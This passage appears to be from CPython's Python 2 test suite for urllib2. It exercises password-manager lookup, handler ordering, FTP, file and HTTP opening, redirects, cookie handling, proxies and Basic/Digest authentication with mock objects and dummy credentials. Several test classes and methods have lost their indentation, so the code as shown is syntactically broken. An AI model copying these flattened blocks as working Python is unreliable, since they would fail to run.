    No special relationship between a.example.com and example.com:

    >>> mgr.find_user_password("a", "http://example.com/")
    ('1', 'a')
    >>> mgr.find_user_password("a", "http://a.example.com/")
    (None, None)

    Ports:

    >>> mgr.find_user_password("Some Realm", "c.example.com")
    (None, None)
    >>> mgr.find_user_password("Some Realm", "c.example.com:3128")
    ('3', 'c')
    >>> mgr.find_user_password("Some Realm", "http://c.example.com:3128")
    ('3', 'c')
    >>> mgr.find_user_password("Some Realm", "d.example.com")
    ('4', 'd')
    >>> mgr.find_user_password("Some Realm", "e.example.com:3128")
    ('5', 'e')

    """
    pass
def test_password_manager_default_port(self):
    # NOTE(review): module-level function with an unused `self` parameter —
    # presumably a historical artifact; the body is an executable doctest,
    # so do not edit the >>> examples or their expected output casually.
    """
    >>> mgr = urllib2.HTTPPasswordMgr()
    >>> add = mgr.add_password

    The point to note here is that we can't guess the default port if there's
    no scheme.  This applies to both add_password and find_user_password.

    >>> add("f", "http://g.example.com:80", "10", "j")
    >>> add("g", "http://h.example.com", "11", "k")
    >>> add("h", "i.example.com:80", "12", "l")
    >>> add("i", "j.example.com", "13", "m")
    >>> mgr.find_user_password("f", "g.example.com:100")
    (None, None)
    >>> mgr.find_user_password("f", "g.example.com:80")
    ('10', 'j')
    >>> mgr.find_user_password("f", "g.example.com")
    (None, None)
    >>> mgr.find_user_password("f", "http://g.example.com:100")
    (None, None)
    >>> mgr.find_user_password("f", "http://g.example.com:80")
    ('10', 'j')
    >>> mgr.find_user_password("f", "http://g.example.com")
    ('10', 'j')
    >>> mgr.find_user_password("g", "h.example.com")
    ('11', 'k')
    >>> mgr.find_user_password("g", "h.example.com:80")
    ('11', 'k')
    >>> mgr.find_user_password("g", "http://h.example.com:80")
    ('11', 'k')
    >>> mgr.find_user_password("h", "i.example.com")
    (None, None)
    >>> mgr.find_user_password("h", "i.example.com:80")
    ('12', 'l')
    >>> mgr.find_user_password("h", "http://i.example.com:80")
    ('12', 'l')
    >>> mgr.find_user_password("i", "j.example.com")
    ('13', 'm')
    >>> mgr.find_user_password("i", "j.example.com:80")
    (None, None)
    >>> mgr.find_user_password("i", "http://j.example.com")
    ('13', 'm')
    >>> mgr.find_user_password("i", "http://j.example.com:80")
    (None, None)

    """
class MockOpener:
    """Records the most recent open()/error() call for later inspection."""
    addheaders = []

    def open(self, req, data=None):
        # Stash the arguments so tests can assert on them.
        self.req = req
        self.data = data

    def error(self, proto, *args):
        self.proto = proto
        self.args = args
class MockFile:
    """A do-nothing stand-in for a file-like object."""

    def read(self, count=None):
        return None

    def readline(self, count=None):
        return None

    def close(self):
        return None
class MockHeaders(dict):
    """Dict exposing an httplib-message-style getheaders() accessor."""

    def getheaders(self, name):
        # The header name is ignored; every stored value is returned.
        return self.values()
class MockResponse(StringIO.StringIO):
    """Canned HTTP response: a StringIO body plus code/msg/headers/url."""

    def __init__(self, code, msg, headers, data, url=None):
        StringIO.StringIO.__init__(self, data)
        self.code = code
        self.msg = msg
        self.headers = headers
        self.url = url

    def info(self):
        return self.headers

    def geturl(self):
        return self.url
class MockCookieJar:
    """Cookie jar double that just records what it was asked to process."""

    def add_cookie_header(self, request):
        self.ach_req = request

    def extract_cookies(self, response, request):
        self.ec_req = request
        self.ec_r = response
class FakeMethod:
    """Callable that forwards (name, action, *args) to a handler function."""

    def __init__(self, meth_name, action, handle):
        self.meth_name = meth_name
        self.action = action
        self.handle = handle

    def __call__(self, *args):
        return self.handle(self.meth_name, self.action, *args)
class MockHandler:
    """Configurable handler double driven by (name, action) method specs.

    Every generated method records its call on self.parent.calls and then
    performs its action string — see handle() for the action vocabulary.
    """
    # useful for testing handler machinery
    # see add_ordered_mock_handlers() docstring
    handler_order = 500
    def __init__(self, methods):
        self._define_methods(methods)
    def _define_methods(self, methods):
        # Each spec item is either "name" (action None) or ("name", action).
        for spec in methods:
            if len(spec) == 2: name, action = spec
            else: name, action = spec, None
            meth = FakeMethod(name, action, self.handle)
            # NOTE: installed on the *class*, so specs are expected to be
            # applied to throwaway subclasses (see add_ordered_mock_handlers).
            setattr(self.__class__, name, meth)
    def handle(self, fn_name, action, *args, **kwds):
        # Record every call before interpreting the action string.
        self.parent.calls.append((self, fn_name, args, kwds))
        if action is None:
            return None
        elif action == "return self":
            return self
        elif action == "return response":
            res = MockResponse(200, "OK", {}, "")
            return res
        elif action == "return request":
            return Request("http://blah/")
        elif action.startswith("error"):
            # "error NNN" routes through OpenerDirector.error(); a
            # non-numeric suffix is passed along as-is.
            code = action[action.rfind(" ")+1:]
            try:
                code = int(code)
            except ValueError:
                pass
            res = MockResponse(200, "OK", {}, "")
            return self.parent.error("http", args[0], res, code, "", {})
        elif action == "raise":
            raise urllib2.URLError("blah")
        assert False
    def close(self): pass
    def add_parent(self, parent):
        # Registering with a parent also resets its recorded call list.
        self.parent = parent
        self.parent.calls = []
    def __lt__(self, other):
        if not hasattr(other, "handler_order"):
            # No handler_order, leave in original order.  Yuck.
            return True
        return self.handler_order < other.handler_order
def add_ordered_mock_handlers(opener, meth_spec):
    """Create MockHandlers from meth_spec and register them on opener.

    meth_spec is a list of lists; each inner list describes one handler and
    mixes method-name strings with (name, action) tuples, eg:

        [["http_error", "ftp_open"], ["http_open"]]

    defines .http_error() and .ftp_open() on one handler and .http_open()
    on another.  Plain strings become methods that merely record their
    arguments and return None; tuples attach an action interpreted by
    MockHandler.handle(), eg:

        [["http_error"], [("http_open", "return request")]]

    Each successive handler gets a slightly larger handler_order, so the
    opener consults them in specification order.
    """
    handlers = []
    for offset, methods in enumerate(meth_spec):
        class MockHandlerSubclass(MockHandler):
            pass
        handler = MockHandlerSubclass(methods)
        handler.handler_order += offset
        handler.add_parent(opener)
        handlers.append(handler)
        opener.add_handler(handler)
    return handlers
def build_test_opener(*handler_instances):
    """Return an OpenerDirector wired up with the given handler objects."""
    director = OpenerDirector()
    for handler in handler_instances:
        director.add_handler(handler)
    return director
class MockHTTPHandler(urllib2.BaseHandler):
    # useful for testing redirections and auth
    # sends supplied headers and code as first response
    # sends 200 OK as second response
    def __init__(self, code, headers):
        # code/headers describe the *first* response only.
        self.code = code
        self.headers = headers
        self.reset()
    def reset(self):
        # Forget previous traffic; the next open() replays the error response.
        self._count = 0
        self.requests = []
    def http_open(self, req):
        import mimetools, httplib, copy
        from StringIO import StringIO
        # Keep a deep copy so later mutation of req doesn't alter the record.
        self.requests.append(copy.deepcopy(req))
        if self._count == 0:
            # First call: report the configured status via the error chain.
            self._count = self._count + 1
            name = httplib.responses[self.code]
            msg = mimetools.Message(StringIO(self.headers))
            return self.parent.error(
                "http", req, MockFile(), self.code, name, msg)
        else:
            # Subsequent calls: plain 200 OK with an empty body.
            self.req = req
            msg = mimetools.Message(StringIO("\r\n\r\n"))
            return MockResponse(200, "OK", msg, "", req.get_full_url())
class MockPasswordManager:
    """Password-manager double: remembers one credential, answers all lookups."""

    def add_password(self, realm, uri, user, password):
        # Remember the most recently registered credentials.
        self.realm = realm
        self.url = uri
        self.user = user
        self.password = password

    def find_user_password(self, realm, authuri):
        # Record what was asked for, then hand back the stored credentials.
        self.target_realm = realm
        self.target_url = authuri
        return self.user, self.password
class OpenerDirectorTests(unittest.TestCase):
def test_add_non_handler(self):
class NonHandler(object):
pass
self.assertRaises(TypeError,
OpenerDirector().add_handler, NonHandler())
def test_badly_named_methods(self):
# test work-around for three methods that accidentally follow the
# naming conventions for handler methods
# (*_open() / *_request() / *_response())
# These used to call the accidentally-named methods, causing a
# TypeError in real code; here, returning self from these mock
# methods would either cause no exception, or AttributeError.
from urllib2 import URLError
o = OpenerDirector()
meth_spec = [
[("do_open", "return self"), ("proxy_open", "return self")],
[("redirect_request", "return self")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
o.add_handler(urllib2.UnknownHandler())
for scheme in "do", "proxy", "redirect":
self.assertRaises(URLError, o.open, scheme+"://example.com/")
def test_handled(self):
# handler returning non-None means no more handlers will be called
o = OpenerDirector()
meth_spec = [
["http_open", "ftp_open", "http_error_302"],
["ftp_open"],
[("http_open", "return self")],
[("http_open", "return self")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
r = o.open(req)
# Second .http_open() gets called, third doesn't, since second returned
# non-None. Handlers without .http_open() never get any methods called
# on them.
# In fact, second mock handler defining .http_open() returns self
# (instead of response), which becomes the OpenerDirector's return
# value.
self.assertEqual(r, handlers[2])
calls = [(handlers[0], "http_open"), (handlers[2], "http_open")]
for expected, got in zip(calls, o.calls):
handler, name, args, kwds = got
self.assertEqual((handler, name), expected)
self.assertEqual(args, (req,))
def test_handler_order(self):
o = OpenerDirector()
handlers = []
for meths, handler_order in [
([("http_open", "return self")], 500),
(["http_open"], 0),
]:
class MockHandlerSubclass(MockHandler): pass
h = MockHandlerSubclass(meths)
h.handler_order = handler_order
handlers.append(h)
o.add_handler(h)
r = o.open("http://example.com/")
# handlers called in reverse order, thanks to their sort order
self.assertEqual(o.calls[0][0], handlers[1])
self.assertEqual(o.calls[1][0], handlers[0])
    def test_raise(self):
        # A handler that raises URLError aborts processing: the error
        # propagates to the caller and no later handler is consulted.
        o = OpenerDirector()
        meth_spec = [
            [("http_open", "raise")],        # first handler raises
            [("http_open", "return self")],  # would succeed, but never runs
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://example.com/")
        self.assertRaises(urllib2.URLError, o.open, req)
        # Only the raising handler was ever called, with (req,) and no kwargs.
        self.assertEqual(o.calls, [(handlers[0], "http_open", (req,), {})])
## def test_error(self):
## # XXX this doesn't actually seem to be used in standard library,
## # but should really be tested anyway...
def test_http_error(self):
# XXX http_error_default
# http errors are a special case
o = OpenerDirector()
meth_spec = [
[("http_open", "error 302")],
[("http_error_400", "raise"), "http_open"],
[("http_error_302", "return response"), "http_error_303",
"http_error"],
[("http_error_302")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
class Unknown:
def __eq__(self, other): return True
req = Request("http://example.com/")
r = o.open(req)
assert len(o.calls) == 2
calls = [(handlers[0], "http_open", (req,)),
(handlers[2], "http_error_302",
(req, Unknown(), 302, "", {}))]
for expected, got in zip(calls, o.calls):
handler, method_name, args = expected
self.assertEqual((handler, method_name), got[:2])
self.assertEqual(args, got[2])
def test_processors(self):
# *_request / *_response methods get called appropriately
o = OpenerDirector()
meth_spec = [
[("http_request", "return request"),
("http_response", "return response")],
[("http_request", "return request"),
("http_response", "return response")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
r = o.open(req)
# processor methods are called on *all* handlers that define them,
# not just the first handler that handles the request
calls = [
(handlers[0], "http_request"), (handlers[1], "http_request"),
(handlers[0], "http_response"), (handlers[1], "http_response")]
for i, (handler, name, args, kwds) in enumerate(o.calls):
if i < 2:
# *_request
self.assertEqual((handler, name), calls[i])
self.assertEqual(len(args), 1)
self.assert_(isinstance(args[0], Request))
else:
# *_response
self.assertEqual((handler, name), calls[i])
self.assertEqual(len(args), 2)
self.assert_(isinstance(args[0], Request))
# response from opener.open is None, because there's no
# handler that defines http_open to handle it
self.assert_(args[1] is None or
isinstance(args[1], MockResponse))
def sanepathname2url(path):
    """Convert a local filesystem *path* into a file: URL path component.

    On Windows, pathname2url() may produce a result starting with "///";
    drop the first two slashes so the path can follow "file://<host>".
    """
    import urllib
    urlpath = urllib.pathname2url(path)
    if os.name == "nt" and urlpath.startswith("///"):
        urlpath = urlpath[2:]
    # XXX don't ask me about the mac...
    return urlpath
class HandlerTests(unittest.TestCase):
    def test_ftp(self):
        # Exercise FTPHandler.ftp_open() URL parsing without touching the
        # network: connect_ftp() is overridden to record its arguments and
        # hand back a canned MockFTPWrapper.
        class MockFTPWrapper:
            def __init__(self, data): self.data = data
            def retrfile(self, filename, filetype):
                self.filename, self.filetype = filename, filetype
                return StringIO.StringIO(self.data), len(self.data)

        class NullFTPHandler(urllib2.FTPHandler):
            def __init__(self, data): self.data = data
            def connect_ftp(self, user, passwd, host, port, dirs,
                            timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
                self.user, self.passwd = user, passwd
                self.host, self.port = host, port
                self.dirs = dirs
                self.ftpwrapper = MockFTPWrapper(self.data)
                return self.ftpwrapper

        import ftplib
        data = "rheum rhaponicum"
        h = NullFTPHandler(data)
        o = h.parent = MockOpener()

        # (url, expected host, port, transfer type, dirs, filename, mimetype)
        for url, host, port, type_, dirs, filename, mimetype in [
            ("ftp://localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://localhost:80/foo/bar/",
             "localhost", 80, "D",
             ["foo", "bar"], "", None),
            ("ftp://localhost/baz.gif;type=a",
             "localhost", ftplib.FTP_PORT, "A",
             [], "baz.gif", None),  # XXX really this should guess image/gif
            ]:
            req = Request(url)
            req.timeout = None
            r = h.ftp_open(req)
            # ftp authentication not yet implemented by FTPHandler
            self.assert_(h.user == h.passwd == "")
            self.assertEqual(h.host, socket.gethostbyname(host))
            self.assertEqual(h.port, port)
            self.assertEqual(h.dirs, dirs)
            self.assertEqual(h.ftpwrapper.filename, filename)
            self.assertEqual(h.ftpwrapper.filetype, type_)
            headers = r.info()
            self.assertEqual(headers.get("Content-type"), mimetype)
            self.assertEqual(int(headers["Content-length"]), len(data))
    def test_file(self):
        # FileHandler.file_open(): reads local files, builds headers from
        # stat() data, and refuses URLs that name a port or a foreign host.
        import rfc822, socket
        h = urllib2.FileHandler()
        o = h.parent = MockOpener()

        TESTFN = test_support.TESTFN
        urlpath = sanepathname2url(os.path.abspath(TESTFN))
        towrite = "hello, world\n"
        # All of these spellings refer to the local file and must open.
        urls = [
            "file://localhost%s" % urlpath,
            "file://%s" % urlpath,
            "file://%s%s" % (socket.gethostbyname('localhost'), urlpath),
            ]
        try:
            localaddr = socket.gethostbyname(socket.gethostname())
        except socket.gaierror:
            localaddr = ''
        if localaddr:
            urls.append("file://%s%s" % (localaddr, urlpath))

        for url in urls:
            f = open(TESTFN, "wb")
            try:
                try:
                    f.write(towrite)
                finally:
                    f.close()

                r = h.file_open(Request(url))
                try:
                    data = r.read()
                    headers = r.info()
                    newurl = r.geturl()
                finally:
                    r.close()
                # Last-modified header is derived from the file's mtime.
                stats = os.stat(TESTFN)
                modified = rfc822.formatdate(stats.st_mtime)
            finally:
                os.remove(TESTFN)
            self.assertEqual(data, towrite)
            self.assertEqual(headers["Content-type"], "text/plain")
            self.assertEqual(headers["Content-length"], "13")
            self.assertEqual(headers["Last-modified"], modified)

        # These URLs name a port or a non-local host, so opening must fail.
        for url in [
            "file://localhost:80%s" % urlpath,
            "file:///file_does_not_exist.txt",
            "file://%s:80%s/%s" % (socket.gethostbyname('localhost'),
                                   os.getcwd(), TESTFN),
            "file://somerandomhost.ontheinternet.com%s/%s" %
                (os.getcwd(), TESTFN),
            ]:
            try:
                f = open(TESTFN, "wb")
                try:
                    f.write(towrite)
                finally:
                    f.close()

                self.assertRaises(urllib2.URLError,
                                  h.file_open, Request(url))
            finally:
                os.remove(TESTFN)

        h = urllib2.FileHandler()
        o = h.parent = MockOpener()
        # XXXX why does // mean ftp (and /// mean not ftp!), and where
        # is file: scheme specified? I think this is really a bug, and
        # what was intended was to distinguish between URLs like:
        # file:/blah.txt (a file)
        # file://localhost/blah.txt (a file)
        # file:///blah.txt (a file)
        # file://ftp.example.com/blah.txt (an ftp URL)
        for url, ftp in [
            ("file://ftp.example.com//foo.txt", True),
            ("file://ftp.example.com///foo.txt", False),
            # XXXX bug: fails with OSError, should be URLError
            ("file://ftp.example.com/foo.txt", False),
            ]:
            req = Request(url)
            try:
                h.file_open(req)
            # XXXX remove OSError when bug fixed
            except (urllib2.URLError, OSError):
                self.assert_(not ftp)
            else:
                self.assert_(o.req is req)
                self.assertEqual(req.type, "ftp")
    def test_http(self):
        # AbstractHTTPHandler.do_open()/do_request_() against a mock HTTP
        # connection class; no real sockets are opened.
        class MockHTTPResponse:
            def __init__(self, fp, msg, status, reason):
                self.fp = fp
                self.msg = msg
                self.status = status
                self.reason = reason
            def read(self):
                return ''

        class MockHTTPClass:
            # Stands in for httplib.HTTPConnection: records host/headers/
            # body, and can be told to raise socket.error from request().
            def __init__(self):
                self.req_headers = []
                self.data = None
                self.raise_on_endheaders = False
            def __call__(self, host, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
                self.host = host
                self.timeout = timeout
                return self
            def set_debuglevel(self, level):
                self.level = level
            def request(self, method, url, body=None, headers={}):
                self.method = method
                self.selector = url
                self.req_headers += headers.items()
                self.req_headers.sort()
                if body:
                    self.data = body
                if self.raise_on_endheaders:
                    import socket
                    raise socket.error()
            def getresponse(self):
                return MockHTTPResponse(MockFile(), {}, 200, "OK")

        h = urllib2.AbstractHTTPHandler()
        o = h.parent = MockOpener()

        url = "http://example.com/"
        for method, data in [("GET", None), ("POST", "blah")]:
            req = Request(url, data, {"Foo": "bar"})
            req.timeout = None
            req.add_unredirected_header("Spam", "eggs")
            http = MockHTTPClass()
            r = h.do_open(http, req)

            # result attributes
            r.read; r.readline  # wrapped MockFile methods
            r.info; r.geturl  # addinfourl methods
            r.code, r.msg == 200, "OK"  # added from MockHTTPClass.getreply()
            hdrs = r.info()
            hdrs.get; hdrs.has_key  # r.info() gives dict from .getreply()
            self.assertEqual(r.geturl(), url)

            self.assertEqual(http.host, "example.com")
            self.assertEqual(http.level, 0)
            self.assertEqual(http.method, method)
            self.assertEqual(http.selector, "/")
            self.assertEqual(http.req_headers,
                             [("Connection", "close"),
                              ("Foo", "bar"), ("Spam", "eggs")])
            self.assertEqual(http.data, data)

        # check socket.error converted to URLError
        http.raise_on_endheaders = True
        self.assertRaises(urllib2.URLError, h.do_open, http, req)

        # check adding of standard headers
        o.addheaders = [("Spam", "eggs")]
        for data in "", None:  # POST, GET
            req = Request("http://example.com/", data)
            r = MockResponse(200, "OK", {}, "")
            newreq = h.do_request_(req)
            if data is None:  # GET
                self.assert_("Content-length" not in req.unredirected_hdrs)
                self.assert_("Content-type" not in req.unredirected_hdrs)
            else:  # POST
                self.assertEqual(req.unredirected_hdrs["Content-length"], "0")
                self.assertEqual(req.unredirected_hdrs["Content-type"],
                                 "application/x-www-form-urlencoded")
            # XXX the details of Host could be better tested
            self.assertEqual(req.unredirected_hdrs["Host"], "example.com")
            self.assertEqual(req.unredirected_hdrs["Spam"], "eggs")

            # don't clobber existing headers
            req.add_unredirected_header("Content-length", "foo")
            req.add_unredirected_header("Content-type", "bar")
            req.add_unredirected_header("Host", "baz")
            req.add_unredirected_header("Spam", "foo")
            newreq = h.do_request_(req)
            self.assertEqual(req.unredirected_hdrs["Content-length"], "foo")
            self.assertEqual(req.unredirected_hdrs["Content-type"], "bar")
            self.assertEqual(req.unredirected_hdrs["Host"], "baz")
            self.assertEqual(req.unredirected_hdrs["Spam"], "foo")
def test_http_doubleslash(self):
# Checks that the presence of an unnecessary double slash in a url doesn't break anything
# Previously, a double slash directly after the host could cause incorrect parsing of the url
h = urllib2.AbstractHTTPHandler()
o = h.parent = MockOpener()
data = ""
ds_urls = [
"http://example.com/foo/bar/baz.html",
"http://example.com//foo/bar/baz.html",
"http://example.com/foo//bar/baz.html",
"http://example.com/foo/bar//baz.html",
]
for ds_url in ds_urls:
ds_req = Request(ds_url, data)
# Check whether host is determined correctly if there is no proxy
np_ds_req = h.do_request_(ds_req)
self.assertEqual(np_ds_req.unredirected_hdrs["Host"],"example.com")
# Check whether host is determined correctly if there is a proxy
ds_req.set_proxy("someproxy:3128",None)
p_ds_req = h.do_request_(ds_req)
self.assertEqual(p_ds_req.unredirected_hdrs["Host"],"example.com")
def test_errors(self):
h = urllib2.HTTPErrorProcessor()
o = h.parent = MockOpener()
url = "http://example.com/"
req = Request(url)
# all 2xx are passed through
r = MockResponse(200, "OK", {}, "", url)
newr = h.http_response(req, r)
self.assert_(r is newr)
self.assert_(not hasattr(o, "proto")) # o.error not called
r = MockResponse(202, "Accepted", {}, "", url)
newr = h.http_response(req, r)
self.assert_(r is newr)
self.assert_(not hasattr(o, "proto")) # o.error not called
r = MockResponse(206, "Partial content", {}, "", url)
newr = h.http_response(req, r)
self.assert_(r is newr)
self.assert_(not hasattr(o, "proto")) # o.error not called
# anything else calls o.error (and MockOpener returns None, here)
r = MockResponse(502, "Bad gateway", {}, "", url)
self.assert_(h.http_response(req, r) is None)
self.assertEqual(o.proto, "http") # o.error called
self.assertEqual(o.args, (req, r, 502, "Bad gateway", {}))
def test_cookies(self):
cj = MockCookieJar()
h = urllib2.HTTPCookieProcessor(cj)
o = h.parent = MockOpener()
req = Request("http://example.com/")
r = MockResponse(200, "OK", {}, "")
newreq = h.http_request(req)
self.assert_(cj.ach_req is req is newreq)
self.assertEquals(req.get_origin_req_host(), "example.com")
self.assert_(not req.is_unverifiable())
newr = h.http_response(req, r)
self.assert_(cj.ec_req is req)
self.assert_(cj.ec_r is r is newr)
    def test_redirect(self):
        # HTTPRedirectHandler: ordinary redirects, POST->GET conversion
        # with header scrubbing, and both loop-detection limits.
        from_url = "http://example.com/a.html"
        to_url = "http://example.com/b.html"
        h = urllib2.HTTPRedirectHandler()
        o = h.parent = MockOpener()

        # ordinary redirect behaviour
        for code in 301, 302, 303, 307:
            for data in None, "blah\nblah\n":
                method = getattr(h, "http_error_%s" % code)
                req = Request(from_url, data)
                req.add_header("Nonsense", "viking=withhold")
                if data is not None:
                    req.add_header("Content-Length", str(len(data)))
                req.add_unredirected_header("Spam", "spam")
                try:
                    method(req, MockFile(), code, "Blah",
                           MockHeaders({"location": to_url}))
                except urllib2.HTTPError:
                    # 307 in response to POST requires user OK
                    self.assert_(code == 307 and data is not None)
                self.assertEqual(o.req.get_full_url(), to_url)
                try:
                    self.assertEqual(o.req.get_method(), "GET")
                except AttributeError:
                    self.assert_(not o.req.has_data())

                # now it's a GET, there should not be headers regarding content
                # (possibly dragged from before being a POST)
                headers = [x.lower() for x in o.req.headers]
                self.assertTrue("content-length" not in headers)
                self.assertTrue("content-type" not in headers)

                # ordinary headers survive; unredirected headers do not
                self.assertEqual(o.req.headers["Nonsense"],
                                 "viking=withhold")
                self.assert_("Spam" not in o.req.headers)
                self.assert_("Spam" not in o.req.unredirected_hdrs)

        # loop detection
        req = Request(from_url)
        def redirect(h, req, url=to_url):
            h.http_error_302(req, MockFile(), 302, "Blah",
                             MockHeaders({"location": url}))
        # Note that the *original* request shares the same record of
        # redirections with the sub-requests caused by the redirections.

        # detect infinite loop redirect of a URL to itself
        req = Request(from_url, origin_req_host="example.com")
        count = 0
        try:
            while 1:
                redirect(h, req, "http://example.com/")
                count = count + 1
        except urllib2.HTTPError:
            # don't stop until max_repeats, because cookies may introduce state
            self.assertEqual(count, urllib2.HTTPRedirectHandler.max_repeats)

        # detect endless non-repeating chain of redirects
        req = Request(from_url, origin_req_host="example.com")
        count = 0
        try:
            while 1:
                redirect(h, req, "http://example.com/%d" % count)
                count = count + 1
        except urllib2.HTTPError:
            self.assertEqual(count,
                             urllib2.HTTPRedirectHandler.max_redirections)
    def test_cookie_redirect(self):
        # cookies shouldn't leak into redirected requests
        from cookielib import CookieJar
        from test.test_cookielib import interact_netscape

        cj = CookieJar()
        # Plant a cookie for www.example.com only.
        interact_netscape(cj, "http://www.example.com/", "spam=eggs")
        # This mock handler answers every request with a 302 to cracker.com.
        hh = MockHTTPHandler(302, "Location: http://www.cracker.com/\r\n\r\n")
        hdeh = urllib2.HTTPDefaultErrorHandler()
        hrh = urllib2.HTTPRedirectHandler()
        cp = urllib2.HTTPCookieProcessor(cj)
        o = build_test_opener(hh, hdeh, hrh, cp)
        o.open("http://www.example.com/")
        # The redirected request (to cracker.com) must not carry the cookie.
        self.assert_(not hh.req.has_header("Cookie"))
def test_proxy(self):
o = OpenerDirector()
ph = urllib2.ProxyHandler(dict(http="proxy.example.com:3128"))
o.add_handler(ph)
meth_spec = [
[("http_open", "return response")]
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://acme.example.com/")
self.assertEqual(req.get_host(), "acme.example.com")
r = o.open(req)
self.assertEqual(req.get_host(), "proxy.example.com:3128")
self.assertEqual([(handlers[0], "http_open")],
[tup[0:2] for tup in o.calls])
    def test_basic_auth(self, quote_char='"'):
        # End-to-end Basic auth: the mock HTTP handler answers 401 with a
        # WWW-Authenticate challenge (realm quoted with quote_char), and
        # HTTPBasicAuthHandler must retry with an Authorization header.
        opener = OpenerDirector()
        password_manager = MockPasswordManager()
        auth_handler = urllib2.HTTPBasicAuthHandler(password_manager)
        realm = "ACME Widget Store"
        http_handler = MockHTTPHandler(
            401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
            (quote_char, realm, quote_char) )
        opener.add_handler(auth_handler)
        opener.add_handler(http_handler)
        self._test_basic_auth(opener, auth_handler, "Authorization",
                              realm, http_handler, password_manager,
                              "http://acme.example.com/protected",
                              "http://acme.example.com/protected",
                              )
    def test_basic_auth_with_single_quoted_realm(self):
        # Some servers quote the realm with ' instead of "; both must work.
        self.test_basic_auth(quote_char="'")
    def test_proxy_basic_auth(self):
        # Same as test_basic_auth, but via a proxy: the challenge is a 407
        # with Proxy-Authenticate, the credentials must go into the
        # Proxy-authorization header, keyed on the proxy's host:port.
        opener = OpenerDirector()
        ph = urllib2.ProxyHandler(dict(http="proxy.example.com:3128"))
        opener.add_handler(ph)
        password_manager = MockPasswordManager()
        auth_handler = urllib2.ProxyBasicAuthHandler(password_manager)
        realm = "ACME Networks"
        http_handler = MockHTTPHandler(
            407, 'Proxy-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
        opener.add_handler(auth_handler)
        opener.add_handler(http_handler)
        self._test_basic_auth(opener, auth_handler, "Proxy-authorization",
                              realm, http_handler, password_manager,
                              "http://acme.example.com:3128/protected",
                              "proxy.example.com:3128",
                              )
    def test_basic_and_digest_auth_handlers(self):
        # HTTPDigestAuthHandler threw an exception if it couldn't handle a 40*
        # response (http://python.org/sf/1479302), where it should instead
        # return None to allow another handler (especially
        # HTTPBasicAuthHandler) to handle the response.

        # Also (http://python.org/sf/14797027, RFC 2617 section 1.2), we must
        # try digest first (since it's the strongest auth scheme), so we record
        # order of calls here to check digest comes first:
        class RecordingOpenerDirector(OpenerDirector):
            # Remembers, in order, which auth scheme handled each 401.
            def __init__(self):
                OpenerDirector.__init__(self)
                self.recorded = []
            def record(self, info):
                self.recorded.append(info)

        class TestDigestAuthHandler(urllib2.HTTPDigestAuthHandler):
            def http_error_401(self, *args, **kwds):
                self.parent.record("digest")
                urllib2.HTTPDigestAuthHandler.http_error_401(self,
                                                             *args, **kwds)

        class TestBasicAuthHandler(urllib2.HTTPBasicAuthHandler):
            def http_error_401(self, *args, **kwds):
                self.parent.record("basic")
                urllib2.HTTPBasicAuthHandler.http_error_401(self,
                                                            *args, **kwds)

        opener = RecordingOpenerDirector()
        password_manager = MockPasswordManager()
        digest_handler = TestDigestAuthHandler(password_manager)
        basic_handler = TestBasicAuthHandler(password_manager)
        realm = "ACME Networks"
        # The server only offers Basic, so digest must fail gracefully.
        http_handler = MockHTTPHandler(
            401, 'WWW-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
        opener.add_handler(basic_handler)
        opener.add_handler(digest_handler)
        opener.add_handler(http_handler)

        # check basic auth isn't blocked by digest handler failing
        self._test_basic_auth(opener, basic_handler, "Authorization",
                              realm, http_handler, password_manager,
                              "http://acme.example.com/protected",
                              "http://acme.example.com/protected",
                              )
        # check digest was tried before basic (twice, because
        # _test_basic_auth called .open() twice)
        self.assertEqual(opener.recorded, ["digest", "basic"]*2)
    def _test_basic_auth(self, opener, auth_handler, auth_header,
                         realm, http_handler, password_manager,
                         request_url, protected_url):
        """Drive one Basic-auth round trip and verify the handler's work.

        auth_header is the header the handler must add ("Authorization" or
        "Proxy-authorization"); protected_url is what the password manager
        is expected to be queried with.
        """
        import base64
        user, password = "wile", "coyote"

        # .add_password() fed through to password manager
        auth_handler.add_password(realm, request_url, user, password)
        self.assertEqual(realm, password_manager.realm)
        self.assertEqual(request_url, password_manager.url)
        self.assertEqual(user, password_manager.user)
        self.assertEqual(password, password_manager.password)

        r = opener.open(request_url)

        # should have asked the password manager for the username/password
        self.assertEqual(password_manager.target_realm, realm)
        self.assertEqual(password_manager.target_url, protected_url)

        # expect one request without authorization, then one with
        self.assertEqual(len(http_handler.requests), 2)
        self.assertFalse(http_handler.requests[0].has_header(auth_header))
        userpass = '%s:%s' % (user, password)
        auth_hdr_value = 'Basic '+base64.encodestring(userpass).strip()
        self.assertEqual(http_handler.requests[1].get_header(auth_header),
                         auth_hdr_value)

        # if the password manager can't find a password, the handler won't
        # handle the HTTP auth error
        password_manager.user = password_manager.password = None
        http_handler.reset()
        r = opener.open(request_url)
        self.assertEqual(len(http_handler.requests), 1)
        self.assertFalse(http_handler.requests[0].has_header(auth_header))
class MiscTests(unittest.TestCase):
    """Tests for build_opener() handler selection."""

    def test_build_opener(self):
        # build_opener(): accepts handler classes and instances, lets
        # subclasses replace the default handler of the same family, and
        # never duplicates a default that was passed in explicitly.
        class MyHTTPHandler(urllib2.HTTPHandler): pass
        class FooHandler(urllib2.BaseHandler):
            def foo_open(self): pass
        class BarHandler(urllib2.BaseHandler):
            def bar_open(self): pass

        build_opener = urllib2.build_opener

        o = build_opener(FooHandler, BarHandler)
        self.opener_has_handler(o, FooHandler)
        self.opener_has_handler(o, BarHandler)

        # can take a mix of classes and instances
        o = build_opener(FooHandler, BarHandler())
        self.opener_has_handler(o, FooHandler)
        self.opener_has_handler(o, BarHandler)

        # subclasses of default handlers override default handlers
        o = build_opener(MyHTTPHandler)
        self.opener_has_handler(o, MyHTTPHandler)

        # a particular case of overriding: default handlers can be passed
        # in explicitly
        o = build_opener()
